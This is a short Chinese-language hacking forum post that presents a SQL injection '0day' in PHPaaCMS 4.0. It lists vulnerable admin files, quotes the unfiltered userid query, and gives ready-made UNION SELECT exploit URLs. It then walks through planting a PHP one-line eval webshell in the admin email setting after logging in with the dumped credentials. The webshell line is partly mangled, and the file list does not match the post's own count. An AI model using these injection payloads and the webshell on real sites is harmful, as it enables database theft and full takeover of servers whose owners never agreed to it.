PHPaaCMS4.0注入0day

一个叫菲哥哥暴的漏洞。一下暴了好多洞。呃，以前还认为PHPaa蛮安全的。

呵，大牛看不上它莫非？俺喜欢注入。就发注入这个的吧。其它的自己百度

一下。

漏洞文件：

admin/page.add.php

admin/ message.action.php

admin/article.add.php

search.php

$userid = trim($_GET [‘userid’])?trim($_GET [‘userid’]):0;//只过滤了空格

find ( “select * from phpaadb_users where userid=” . $userid );

以上3个页面均是对userid 过滤不严造成的。

利用EXP：

http://www.tmdsb.com/admin/friendlink.add.php?act=edit&id=1%20and%201=2%20union%20select%201,2,3,user%28%29,5,6

http://www.tmdsb.com/phpaaCMS/admin/user.add.php?act=edit,&userid=31  union select 1,user(),3

http://www.tmdsb.com/admin/article.add.php?act=add&cid=1&id=32%27

拿webshell的方法如下：

暴了管理员的帐号密码后登陆后台。然后在网站配置的地方有个管理员邮箱的。直接

写一句话：/“&＃41;?>php @eval&＃40;$_POST&＃91;tmd&＃93; //

然后连接一句话website.inc.php